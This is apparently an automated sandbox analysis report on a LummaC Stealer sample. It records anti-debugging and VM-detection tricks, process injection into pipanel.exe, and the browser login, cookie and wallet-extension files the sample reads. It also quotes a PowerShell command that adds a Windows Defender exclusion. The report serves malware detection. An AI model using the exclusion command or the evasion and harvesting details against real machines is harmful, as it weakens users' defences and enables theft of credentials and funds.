Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030A8A second address: 3030AE8 instructions: 0x00000000 rdtsc 0x00000002 push dx 0x00000004 mov ax, word ptr [esp] 0x00000008 jmp 00007FF40087ED63h 0x0000000a xchg word ptr [esp], bp 0x0000000e pushad 0x0000000f not al 0x00000011 xchg eax, ebp 0x00000012 xchg ax, dx 0x00000014 pushfd 0x00000015 jmp 00007FF40087ED0Fh 0x00000017 bswap ebp 0x00000019 lea ebp, dword ptr [00000000h+edi*4] 0x00000020 mov eax, esp 0x00000022 mov dword ptr [esp+1Dh], edi 0x00000026 jmp 00007FF40087ED5Ah 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030AE8 second address: 3030B19 instructions: 0x00000000 rdtsc 0x00000002 mov word ptr [esp+06h], sp 0x00000007 lea edx, dword ptr [edi+edi] 0x0000000a mov dword ptr [esp+04h], esi 0x0000000e mov dx, ax 0x00000011 pop ax 0x00000013 jmp 00007FF401882807h 0x00000015 lea edx, dword ptr [00000000h+ebx*4] 0x0000001c lea esp, dword ptr [esp+11h] 0x00000020 setp al 0x00000023 mov edx, esp 0x00000025 jmp 00007FF40188284Bh 0x00000027 mov al, 34h 0x00000029 not bp 0x0000002c setne ah 0x0000002f setnp dl 0x00000032 xchg edx, eax 0x00000034 mov ebp, eax 0x00000036 jmp 00007FF4018828ADh 0x00000038 xchg word ptr [esp+07h], dx 0x0000003d pop word ptr [esp+0Ch] 0x00000042 lea eax, dword ptr [esp+1F1D9B4Eh] 0x00000049 mov dword ptr [esp+06h], esp 0x0000004d push word ptr [esp+10h] 0x00000052 mov dword ptr [esp+0Ch], edx 0x00000056 jmp 00007FF401882797h 0x0000005b lea ebp, dword ptr [edx-00000087h] 0x00000061 mov dh, 66h 0x00000063 not bp 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030B19 second address: 3030B7F instructions: 0x00000000 rdtsc 0x00000002 push dword ptr [esp+02h] 0x00000006 jmp 00007FF40087ED6Ch 0x00000008 lea eax, dword ptr [00000000h+edi*4] 0x0000000f not al 0x00000011 not ax 0x00000014 bswap eax 0x00000016 not bp 0x00000019 mov ebp, B44F9BA3h 0x0000001e jmp 00007FF40087ECF2h 0x00000020 mov bp, word ptr [esp+09h] 0x00000025 xchg byte ptr [esp+09h], dl 0x00000029 mov dh, ch 0x0000002b pop ebp 0x0000002c mov ebp, esp 0x0000002e lea esp, dword ptr [esp+03h] 0x00000032 jmp 00007FF40087ED5Eh 0x00000034 mov al, byte ptr [esp] 0x00000037 mov bp, 3896h 0x0000003b mov dh, cl 0x0000003d mov ebp, dword ptr [esp] 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe RDTSC instruction interceptor: First address: 3030991 second address: 3030981 instructions: 0x00000000 rdtsc 0x00000002 lea esi, dword ptr [00000000h+eax*4] 0x00000009 lea ebx, dword ptr [esi+ebp] 0x0000000c xchg dx, di 0x0000000f pop ax 0x00000011 jmp 00007FF401882806h 0x00000013 mov word ptr [esp+04h], si 0x00000018 xchg ah, cl 0x0000001a xchg al, dl 0x0000001c rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 31D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 5170000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 4EF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: ECB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 10CB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 12970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 13970000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 14010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 16010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: 19010000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00BD5DD0 rdtsc 0_2_00BD5DD0
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Window / User API: threadDelayed 444 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Window / User API: threadDelayed 436 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1916 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 772 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\mDHwap5GlV.exe API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe API coverage: 6.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 2008 Thread sleep count: 444 > 30 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 5332 Thread sleep count: 60 > 30 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 3608 Thread sleep count: 436 > 30 Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe TID: 2008 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 180 Thread sleep count: 1916 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 Thread sleep count: 772 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3448 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe TID: 1464 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe TID: 3176 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: mDHwap5GlV.exe Binary or memory string: VMware
Source: mDHwap5GlV.exe Binary or memory string: Hyper-V
Source: mDHwap5GlV.exe Binary or memory string: QEMU
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V<
Source: pipanel.exe, 00000008.00000002.3302032676.0000000003224000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3300982057.0000000003224000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000002.3301790108.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3299967549.0000000003224000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU<
Source: mDHwap5GlV.exe, 00000000.00000002.2590464295.000000000C4DD000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.1974381057.000000000C4D2000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.1792977855.000000000C4F4000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.2564527873.000000000C4DD000.00000004.00000020.00020000.00000000.sdmp, mDHwap5GlV.exe, 00000000.00000003.1863009432.000000000C4F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mDHwap5GlV.exe, 00000000.00000002.2568628976.0000000005171000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware<
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058D3 Start: 03005C96 End: 03005C9F 7_2_030058D3
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030058EE Start: 03005C96 End: 03005C9F 7_2_030058EE
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C38 Start: 03005C96 End: 03005C9F 7_2_03005C38
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005C53 Start: 03005C96 End: 03005C9F 7_2_03005C53
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00BD5DD0 rdtsc 0_2_00BD5DD0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00B300D0 IsDebuggerPresent, 0_2_00B300D0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03001237 mov edx, dword ptr fs:[00000030h] 7_2_03001237
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002932 mov edx, dword ptr fs:[00000030h] 7_2_03002932
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_0300370B mov eax, dword ptr fs:[00000030h] 7_2_0300370B
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03005FE5 mov edx, dword ptr fs:[00000030h] 7_2_03005FE5
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030106AF mov eax, dword ptr fs:[00000030h] 7_2_030106AF
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_030106C0 mov eax, dword ptr fs:[00000030h] 7_2_030106C0
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Code function: 7_2_03002578 mov ebx, dword ptr fs:[00000030h] 7_2_03002578
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00BC2010 GetProcessHeap,RtlAllocateHeap, 0_2_00BC2010
Enables debug privileges
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00E2E559 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00E2E559
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\"
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\" Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory allocated: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory allocated: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2EC0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory allocated: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2ED0000 protect: page execute and read and write Jump to behavior
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_009B06A0 IsDebuggerPresent,RaiseFailFastException,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,SetErrorMode,SetErrorMode,IsDebuggerPresent,DebugBreak,SetErrorMode,SetErrorMode, 0_2_009B06A0
Hijacks the control flow in another process
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: PID: 3732 base: 76F02EC0 value: E9 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 442000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 445000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 456000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 457000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2C5C008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2EC0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 76F02EC0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 2ED0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 31D2D00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Memory written: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe base: 31D2CFC Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\" Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Process created: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe Process created: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe "C:\Users\user\AppData\Local\Temp\decrypted_app_1.exe" Jump to behavior
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: TrayNotifyWndShell_TrayWndU
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: SHELL_TRAYWND
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: Shell_TrayWndtooltips_class32SV
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: Shell_TrayWndU
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: PROGMAN
Source: decrypted_app_1.exe, 00000007.00000000.2526968446.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, decrypted_app_1.exe.0.dr Binary or memory string: SHELL_TRAYWNDU
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\mDHwap5GlV.exe Code function: 0_2_00E2F13E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E2F13E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: pipanel.exe, 00000008.00000003.3251284815.00000000032AA000.00000004.00000020.00020000.00000000.sdmp, pipanel.exe, 00000008.00000003.3251424268.0000000003287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: pipanel.exe PID: 3732, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: pipanel.exe, 00000008.00000003.3177873716.0000000003289000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: pipanel.exe String found in binary or memory: Wallets/ElectronCash
Source: pipanel.exe String found in binary or memory: Jaxx Liberty
Source: pipanel.exe, 00000008.00000003.3177873716.0000000003289000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: pipanel.exe String found in binary or memory: ExodusWeb3
Source: pipanel.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: mDHwap5GlV.exe, 00000000.00000002.2594220011.000000000CBE1000.00000020.00000001.00040000.00000003.sdmp String found in binary or memory: get_MachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
